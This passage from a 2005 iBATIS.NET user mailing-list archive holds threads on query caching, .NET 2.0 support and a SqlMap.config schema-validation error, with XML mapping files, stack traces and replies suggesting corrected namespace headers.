web25608.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 13 Dec 2005 04:33:51 -0800 Received: (qmail 14630 invoked by uid 60001); 13 Dec 2005 12:04:56 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.es; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=mXGDMCjQiPeLD4eGNUugw3bjMieUrM5WepOHZ51mDm2UxX+mFHBsgNeMfOEZnnsmZJyo2EWO0WXxZrtQPAXsST8ycX2U/e8rQV0PEx/oYymaxT69n943CzdU7S+B7bb9D0t9Cw4SpSZbTG7Yi3iwZ3/nzTxtMQEDpKCHUvVrEzg= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web25608.mail.ukl.yahoo.com via HTTP; Tue, 13 Dec 2005 13:04:56 CET Date: Tue, 13 Dec 2005 13:04:56 +0100 (CET) From: Mariano <[email protected]> Subject: Re: Cache Ibatis .NET To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi thnks I've discovered my error, I tried to put cache, two Sql operations with the same id="CONFIGURACIONSelect" <select id="CONFIGURACIONSelect" resultClass="configuracion" cacheModel="cacheConfBiz"> SELECT [Key],VALUE,APLICACION,ID_CONFIGURATION, ENCRIPTACION FROM CONFIGURATION_BIZ where APLICACION=#APLICACIONS# </select> I executed two opertations but with different values of "#APLICACIONS#", but only recovered the first operation, because it was in cache. I thought that if I change the value, Ibatis would create a new Sql in Cache. tnks > The cache has been working for quite some time. Are > you able to get > IBatisNet working normally without the cache? The > error message you're > seeing looks a general ASP.Net error and not > necessarily by IBatisNet. > I've seen that error while trying to access a page > while the app domain > is reloading itself (i.e. you go to a page while the > web application is > reloading itself). > > --- Mariano <[email protected]> wrote: > > > > > hello alls > > > > Ive tried use Ibatis cache but it doesnt work. > > > > This is my SqlMap > > > > > > <?xml version="1.0" encoding="utf-8" ?> > > <sqlMap namespace="Configuracion" > > > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" > > xsi:noNamespaceSchemaLocation="SqlMap.xsd"> > > > > <alias> > > <typeAlias alias="configuracion" > > type="Acceso.Configuracion, Acceso" /> > > </alias> > > > > <cacheModels> > > <cacheModel id="cacheConfBiz" > implementation="LRU"> > > <flushInterval minutes="5"/> > > <flushOnExecute > statement="CONFIGURACIONDelete"/> > > <flushOnExecute > statement="CONFIGURACIONUpdate"/> > > <flushOnExecute > statement="CONFIGURACIONInsert"/> > > <property name="CacheSize" value="10"/> > > </cacheModel> > > > > </cacheModels> > > > > > > <statements> > > <!-- PROCEDMIENTO SELECT --> > > <select id="CONFIGURACIONSelect" > > resultClass="configuracion" > cacheModel="cacheConfBiz"> > > SELECT > [Key],VALUE,APLICACION,ID_CONFIGURATION, > > ENCRIPTACION FROM CONFIGURATION_BIZ > > where APLICACION=#APLICACIONS# > > </select> > > </statements> > > > > > > Show me this msg error > > Server Application Unavailable > > The web application you are attempting to access > on > > this web server is currently unavailable.� > Please hit > > the "Refresh" button in your web browser to retry > your > > request. > > Administrator Note: An error message detailing the > > cause of this specific request failure can be > found in > > the application event log of the web server. > Please > > review this log entry to discover what caused this > > error to occur. > > > > > > > > > > ______________________________________________ > > Renovamos el Correo Yahoo! > > Nuevos servicios, m�s seguridad > > http://correo.yahoo.es > > > > ______________________________________________ Renovamos el Correo Yahoo! Nuevos servicios, más seguridad http://correo.yahoo.es From [email protected] Tue Dec 13 17:39:04 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34911 invoked from network); 13 Dec 2005 17:39:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Dec 2005 17:39:03 -0000 Received: (qmail 4520 invoked by uid 500); 13 Dec 2005 17:38:58 -0000 Delivered-To: [email protected] Received: (qmail 4406 invoked by uid 500); 13 Dec 2005 17:38:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4351 invoked by uid 99); 13 Dec 2005 17:38:57 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Dec 2005 09:38:57 -0800 X-ASF-Spam-Status: No, hits=1.9 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,MSGID_FROM_MTA_HEADER,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO hotmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Dec 2005 09:38:55 -0800 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 13 Dec 2005 09:38:35 -0800 Message-ID: <[email protected]> Received: from 161.129.204.104 by by101fd.bay101.hotmail.msn.com with HTTP; Tue, 13 Dec 2005 17:38:34 GMT X-Originating-IP: [161.129.204.104] X-Originating-Email: [[email protected]] X-Sender: [email protected] From: "Lee Roland" <[email protected]> To: [email protected] Subject: Support for .NET 2.0? Date: Tue, 13 Dec 2005 12:38:34 -0500 Mime-Version: 1.0 Content-Type: text/plain; format=flowed X-OriginalArrivalTime: 13 Dec 2005 17:38:35.0032 (UTC) FILETIME=[0AF8C180:01C6000C] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello, Does the iBatis.NET DataMapper 1.2.1 General Availability release support .NET 2.0? Thanks From [email protected] Wed Dec 14 07:57:19 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11568 invoked from network); 14 Dec 2005 07:57:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2005 07:57:18 -0000 Received: (qmail 15906 invoked by uid 500); 14 Dec 2005 07:57:18 -0000 Delivered-To: [email protected] Received: (qmail 15886 invoked by uid 500); 14 Dec 2005 07:57:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15875 invoked by uid 99); 14 Dec 2005 07:57:17 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Dec 2005 23:57:17 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Dec 2005 23:57:16 -0800 Received: by zproxy.gmail.com with SMTP id z3so49056nzf for <[email protected]>; Tue, 13 Dec 2005 23:56:56 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=fqhVB6A0ZAn/qBIBG11TaNjWE+yb8J/RoozMrXxPWdmB8tGiwTpjb5F6TVAvx7Kk1jILQSKulm6T9Hpk5K3yBZR4KuBxTUk3fopBV9X7ZIfXIlTat07KSknHNib6AeJY2PJHw6d0TQNvZaqzXdjc8k0vOBrmcMlis2Yj+ZK1ewI= Received: by 161.129.204.104 with SMTP id r11mr192468qbn; Tue, 13 Dec 2005 23:56:54 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 13 Dec 2005 23:56:54 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 14 Dec 2005 09:56:54 +0200 From: oleksa borodie <[email protected]> To: [email protected] Subject: Re: Support for .NET 2.0? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello. I've build iBATIS with .Net 2.0 framework. Builds fine but some tests fails. On my test project works fine. Good luck. On 12/13/05, Lee Roland <[email protected]> wrote: > Hello, > > Does the iBatis.NET DataMapper 1.2.1 General Availability release support > .NET 2.0? > > Thanks > > > From [email protected] Wed Dec 14 14:26:22 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 15343 invoked from network); 14 Dec 2005 14:26:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2005 14:26:22 -0000 Received: (qmail 1245 invoked by uid 500); 14 Dec 2005 14:26:21 -0000 Delivered-To: [email protected] Received: (qmail 1229 invoked by uid 500); 14 Dec 2005 14:26:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1217 invoked by uid 99); 14 Dec 2005 14:26:21 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Dec 2005 06:26:21 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO usryim09.merck.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Dec 2005 06:26:20 -0800 Received: from 161.129.204.104 by usryim09.merck.com with ESMTP (SMTP Relay); Wed, 14 Dec 2005 09:25:44 -0500 X-Server-Uuid: 078441B8-8B94-4128-83AA-0F28411313D9 Received: from 161.129.204.104 by usrytw30.merck.com with ESMTP (Tumbleweed Email Firewall SMTP Relay (Email Firewall v6.1.1)); Wed, 14 Dec 2005 09:25:31 -0500 X-Server-Uuid: 5A1583D2-9438-462B-8CA0-21F9DF195542 Received: by usrygw32.merck.com with Internet Mail Service (5.5.2658.27) id <V7DAJ0WQ>; Wed, 14 Dec 2005 09:25:31 -0500 Message-ID: <[email protected]> From: "Hoffman, Ira" <[email protected]> To: "'[email protected]'" <[email protected]> Subject: iBatis and Visual Studio 2005 Woes Date: Wed, 14 Dec 2005 09:25:25 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2658.27) X-WSS-ID: 6FBEF4D133O2582358-01-01 X-WSS-ID: 6FBEF4D42DC11748359-05-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N All, I am trying to develop a .NET 2.0 middle-tier that leverages iBatis. I have used iBatis before, in the Java world, and greatly enjoyed it. However, I am having problems getting the most basic configuration working with Visual Studio 2005 and iBatis. I have created a new ASP .NET Web Service Project and am unable to read the sqlMap.config properties file. Here is the error message: IBatisNet.Common.Exceptions.ConfigurationException: - The error occurred while Validate SqlMap config. - The error occurred in The 'file' attribute is not declared. The 'useFullyQualifiedStatementNames' attribute is not declared. The 'file' attribute is not declared. . ---> IBatisNet.Common.Exceptions.ConfigurationException: Invalid SqlMap.config document. cause :The 'file' attribute is not declared. The 'useFullyQualifiedStatementNames' attribute is not declared. The 'file' attribute is not declared. at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ValidateSchema(XmlNode section, String schemaFileName) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) --- End of inner exception stack trace --- at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(String resource, ConfigureHandler configureDelegate) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(Config ureHandler configureDelegate) at MerckSAS.Library.Services.Mapper.InitMapper() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 25 at MerckSAS.Library.Services.Mapper.Instance() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 36 at MerckSAS.Library.Services.Mapper.Get() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 45 at MerckSasService..ctor() in c:\Inetpub\wwwroot\MerckSAS\App_Code\MerckSasService.cs:line 23 Here is my sqlMap.config file: <?xml version="1.0" encoding="utf-8" ?> <sqlMapConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="SqlMapConfig.xsd"> <properties file="database.properties" /> <settings> <setting useFullyQualifiedStatementNames="false" /> <setting cacheModelsEnabled="true" /> </settings> <database> <provider name="oracle9.2" /> <dataSource name="REMP" connectionString="user id=${username};password=${password};data source=${datasource};connection reset=false;connection lifetime=5;min pool size=1;max pool size=50" /> </database> <sqlMaps> <sqlMap file="Maps/SqlMap.xml" /> </sqlMaps> </sqlMapConfig> Here is my SqlMap.xml file: <?xml version='1.0'?> <sqlMap namespace="Remp" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="..\SqlMap.xsd"> <resultMaps> <resultMap id="getSubstanceLibraryMap" class="subtanceLibrary"> <result property="projectId" column="project_id"/> <result property="projectName" column="project_name"/> <result property="projectShortName" column="project_short_name"/> <result property="dlcAssayId" column="dlc_assay_id"/> <result property="sourceProjectPlateLayoutId" column="source_plate_layout_id"/> <result property="destinationProjectPlateLayoutId" column="destination_plate_layout_id"/> <result property="dlcProtocolVersion" column="dlc_protocol_version"/> </resultMap> <resultMap id="getCompoundMap" class="compound"> <result property="CompoundId" column="CPD_ID"/> <result property="Name" column="NAME"/> <result property="AlternateName" column="ALTERNATENAME"/> <result property="MolecularWeight" column="MOLWEIGHT"/> <result property="MutDateTime" column="MUT_DATETIME"/> </resultMap> </resultMaps> <statements> <select id="selectSubstanceLibrary" resultMap="getSubstanceLibraryMap"> select * from subst_library </select> <select id="selectCompound" resultMap="getCompoundMap"> select * from compound </select> </statements> </sqlMap> I wasn't too sure about the directory location of the SqlMap.config file...any ideas abou this error? Thanks, Ira ------------------------------------------------------------------------------ Notice: This e-mail message, together with any attachments, contains information of Merck & Co., Inc. (One Merck Drive, Whitehouse Station, New Jersey, USA 08889), and/or its affiliates (which may be known outside the United States as Merck Frosst, Merck Sharp & Dohme or MSD and in Japan, as Banyu) that may be confidential, proprietary copyrighted and/or legally privileged. It is intended solely for the use of the individual or entity named on this message. If you are not the intended recipient, and have received this message in error, please notify us immediately by reply e-mail and then delete it from your system. ------------------------------------------------------------------------------ From [email protected] Wed Dec 14 16:38:55 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84477 invoked from network); 14 Dec 2005 16:38:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2005 16:38:55 -0000 Received: (qmail 86440 invoked by uid 500); 14 Dec 2005 16:38:54 -0000 Delivered-To: [email protected] Received: (qmail 86424 invoked by uid 500); 14 Dec 2005 16:38:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86413 invoked by uid 99); 14 Dec 2005 16:38:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Dec 2005 08:38:54 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web32207.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 14 Dec 2005 08:38:53 -0800 Received: (qmail 66309 invoked by uid 60001); 14 Dec 2005 16:38:32 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Date:From:Reply-To:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=xzLpMrgYQVU+mFhEvvqZ4WkmVWQzsK4duW+1uiaW7U0UWAyx5VwyVRy3sJ0hDaoMFIXO3sY1E558gqPA76TilJvmMruA0P1UjJU1oHj+k0KIM2AB548iTOYUb2RwidV0UuWPNC5Kh+GwJBFRFzvsOcPRSpKxYj5GiXYThbX3jXA= ; Message-ID: <[email protected]> Date: Wed, 14 Dec 2005 08:38:32 -0800 (PST) From: Ron Grabowski <[email protected]> Reply-To: Ron Grabowski <[email protected]> Subject: Re: iBatis and Visual Studio 2005 Woes To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N The top of your SqlMap.config file should look something like this: <?xml version="1.0" encoding="UTF-8" ?> xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" > The top of your sqlMap files should look like this: <?xml version="1.0" encoding="UTF-8" ?> <sqlMap namespace="Customer" xmlns="http://ibatis.apache.org/mapping" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> ----- Original Message ---- From: "Hoffman, Ira" <[email protected]> To: "[email protected]" <[email protected]> Sent: Wednesday, December 14, 2005 6:25:25 AM Subject: iBatis and Visual Studio 2005 Woes All, I am trying to develop a .NET 2.0 middle-tier that leverages iBatis. I have used iBatis before, in the Java world, and greatly enjoyed it. However, I am having problems getting the most basic configuration working with Visual Studio 2005 and iBatis. I have created a new ASP .NET Web Service Project and am unable to read the sqlMap.config properties file. Here is the error message: IBatisNet.Common.Exceptions.ConfigurationException: - The error occurred while Validate SqlMap config. - The error occurred in The 'file' attribute is not declared. The 'useFullyQualifiedStatementNames' attribute is not declared. The 'file' attribute is not declared. . ---> IBatisNet.Common.Exceptions.ConfigurationException: Invalid SqlMap.config document. cause :The 'file' attribute is not declared. The 'useFullyQualifiedStatementNames' attribute is not declared. The 'file' attribute is not declared. at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ValidateSchema(XmlNode section, String schemaFileName) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) --- End of inner exception stack trace --- at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(String resource, ConfigureHandler configureDelegate) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(Config ureHandler configureDelegate) at MerckSAS.Library.Services.Mapper.InitMapper() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 25 at MerckSAS.Library.Services.Mapper.Instance() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 36 at MerckSAS.Library.Services.Mapper.Get() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 45 at MerckSasService..ctor() in c:\Inetpub\wwwroot\MerckSAS\App_Code\MerckSasService.cs:line 23 Here is my sqlMap.config file: <?xml version="1.0" encoding="utf-8" ?> <sqlMapConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; xsi:noNamespaceSchemaLocation="SqlMapConfig.xsd"> <properties file="database.properties" /> <settings> <setting useFullyQualifiedStatementNames="false" /> <setting cacheModelsEnabled="true" /> </settings> <database> <provider name="oracle9.2" /> <dataSource name="REMP" connectionString="user id=${username};password=${password};data source=${datasource};connection reset=false;connection lifetime=5;min pool size=1;max pool size=50" /> </database> <sqlMaps> <sqlMap file="Maps/SqlMap.xml" /> </sqlMaps> </sqlMapConfig> Here is my SqlMap.xml file: <?xml version='1.0'?> <sqlMap namespace="Remp" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; xsi:noNamespaceSchemaLocation="..\SqlMap.xsd"> <resultMaps> <resultMap id="getSubstanceLibraryMap" class="subtanceLibrary"> <result property="projectId" column="project_id"/> <result property="projectName" column="project_name"/> <result property="projectShortName" column="project_short_name"/> <result property="dlcAssayId" column="dlc_assay_id"/> <result property="sourceProjectPlateLayoutId" column="source_plate_layout_id"/> <result property="destinationProjectPlateLayoutId" column="destination_plate_layout_id"/> <result property="dlcProtocolVersion" column="dlc_protocol_version"/> </resultMap> <resultMap id="getCompoundMap" class="compound"> <result property="CompoundId" column="CPD_ID"/> <result property="Name" column="NAME"/> <result property="AlternateName" column="ALTERNATENAME"/> <result property="MolecularWeight" column="MOLWEIGHT"/> <result property="MutDateTime" column="MUT_DATETIME"/> </resultMap> </resultMaps> <statements> <select id="selectSubstanceLibrary" resultMap="getSubstanceLibraryMap"> select * from subst_library </select> <select id="selectCompound" resultMap="getCompoundMap"> select * from compound </select> </statements> </sqlMap> I wasn't too sure about the directory location of the SqlMap.config file...any ideas abou this error? Thanks, Ira ------------------------------------------------------------------------------ Notice: This e-mail message, together with any attachments, contains information of Merck & Co., Inc. (One Merck Drive, Whitehouse Station, New Jersey, USA 08889), and/or its affiliates (which may be known outside the United States as Merck Frosst, Merck Sharp & Dohme or MSD and in Japan, as Banyu) that may be confidential, proprietary copyrighted and/or legally privileged. It is intended solely for the use of the individual or entity named on this message. If you are not the intended recipient, and have received this message in error, please notify us immediately by reply e-mail and then delete it from your system. ------------------------------------------------------------------------------ From [email protected] Wed Dec 14 16:43:41 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87127 invoked from network); 14 Dec 2005 16:43:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2005 16:43:40 -0000 Received: (qmail 95301 invoked by uid 500); 14 Dec 2005 16:43:32 -0000 Delivered-To: [email protected] Received: (qmail 95243 invoked by uid 500); 14 Dec 2005 16:43:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95199 invoked by uid 99); 14 Dec 2005 16:43:31 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Dec 2005 08:43:31 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web32202.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 14 Dec 2005 08:43:30 -0800 Received: (qmail 5161 invoked by uid 60001); 14 Dec 2005 16:43:09 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Date:From:Reply-To:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=qGR1mcp34Do7y3ZbrXzCMCIHbHIGARxfFAWndXsUctku1RmEB5VhwIU1V8WTmpL6OFrmSoCFw7kAbJzny7+cfQXv5RBKkyrJu3louCYkYrxJOBvY/qqy5JjzuWRmGCqurr9Bz1VT3xER6I3WhhQKIfBd3hbP1mh28ospf9Xoa7s= ; Message-ID: <[email protected]> Date: Wed, 14 Dec 2005 08:43:09 -0800 (PST) From: Ron Grabowski <[email protected]> Reply-To: Ron Grabowski <[email protected]> Subject: Re: iBatis and Visual Studio 2005 Woes To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Yahoo switched me over to their new Yahoo Mail beta so I don't know if my message posted ok. Here's a link with a more complete example: http://tinyurl.com/apa4s http://svn.apache.org/viewcvs.cgi/ibatis/trunk/cs/mapper/IBatisNet.DataMapper.Test/Maps/MSSQL/SqlClient/Category.xml?view=markup ----- Original Message ---- From: Ron Grabowski <[email protected]> To: [email protected] Sent: Wednesday, December 14, 2005 8:38:32 AM Subject: Re: iBatis and Visual Studio 2005 Woes The top of your SqlMap.config file should look something like this: <?xml version="1.0" encoding="UTF-8" ?> xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; > The top of your sqlMap files should look like this: <?xml version="1.0" encoding="UTF-8" ?> <sqlMap namespace="Customer" xmlns="http://ibatis.apache.org/mapping"; xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";> ----- Original Message ---- From: "Hoffman, Ira" <[email protected]> To: "[email protected]" <[email protected]> Sent: Wednesday, December 14, 2005 6:25:25 AM Subject: iBatis and Visual Studio 2005 Woes All, I am trying to develop a .NET 2.0 middle-tier that leverages iBatis. I have used iBatis before, in the Java world, and greatly enjoyed it. However, I am having problems getting the most basic configuration working with Visual Studio 2005 and iBatis. I have created a new ASP .NET Web Service Project and am unable to read the sqlMap.config properties file. Here is the error message: IBatisNet.Common.Exceptions.ConfigurationException: - The error occurred while Validate SqlMap config. - The error occurred in The 'file' attribute is not declared. The 'useFullyQualifiedStatementNames' attribute is not declared. The 'file' attribute is not declared. . ---> IBatisNet.Common.Exceptions.ConfigurationException: Invalid SqlMap.config document. cause :The 'file' attribute is not declared. The 'useFullyQualifiedStatementNames' attribute is not declared. The 'file' attribute is not declared. at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ValidateSchema(XmlNode section, String schemaFileName) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) --- End of inner exception stack trace --- at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(String resource, ConfigureHandler configureDelegate) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(Config ureHandler configureDelegate) at MerckSAS.Library.Services.Mapper.InitMapper() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 25 at MerckSAS.Library.Services.Mapper.Instance() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 36 at MerckSAS.Library.Services.Mapper.Get() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 45 at MerckSasService..ctor() in c:\Inetpub\wwwroot\MerckSAS\App_Code\MerckSasService.cs:line 23 Here is my sqlMap.config file: <?xml version="1.0" encoding="utf-8" ?> <sqlMapConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";; xsi:noNamespaceSchemaLocation="SqlMapConfig.xsd"> <properties file="database.properties" /> <settings> <setting useFullyQualifiedStatementNames="false" /> <setting cacheModelsEnabled="true" /> </settings> <database> <provider name="oracle9.2" /> <dataSource name="REMP" connectionString="user id=${username};password=${password};data source=${datasource};connection reset=false;connection lifetime=5;min pool size=1;max pool size=50" /> </database> <sqlMaps> <sqlMap file="Maps/SqlMap.xml" /> </sqlMaps> </sqlMapConfig> Here is my SqlMap.xml file: <?xml version='1.0'?> <sqlMap namespace="Remp" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";; xsi:noNamespaceSchemaLocation="..\SqlMap.xsd"> <resultMaps> <resultMap id="getSubstanceLibraryMap" class="subtanceLibrary"> <result property="projectId" column="project_id"/> <result property="projectName" column="project_name"/> <result property="projectShortName" column="project_short_name"/> <result property="dlcAssayId" column="dlc_assay_id"/> <result property="sourceProjectPlateLayoutId" column="source_plate_layout_id"/> <result property="destinationProjectPlateLayoutId" column="destination_plate_layout_id"/> <result property="dlcProtocolVersion" column="dlc_protocol_version"/> </resultMap> <resultMap id="getCompoundMap" class="compound"> <result property="CompoundId" column="CPD_ID"/> <result property="Name" column="NAME"/> <result property="AlternateName" column="ALTERNATENAME"/> <result property="MolecularWeight" column="MOLWEIGHT"/> <result property="MutDateTime" column="MUT_DATETIME"/> </resultMap> </resultMaps> <statements> <select id="selectSubstanceLibrary" resultMap="getSubstanceLibraryMap"> select * from subst_library </select> <select id="selectCompound" resultMap="getCompoundMap"> select * from compound </select> </statements> </sqlMap> I wasn't too sure about the directory location of the SqlMap.config file...any ideas abou this error? Thanks, Ira ------------------------------------------------------------------------------ Notice: This e-mail message, together with any attachments, contains information of Merck & Co., Inc. (One Merck Drive, Whitehouse Station, New Jersey, USA 08889), and/or its affiliates (which may be known outside the United States as Merck Frosst, Merck Sharp & Dohme or MSD and in Japan, as Banyu) that may be confidential, proprietary copyrighted 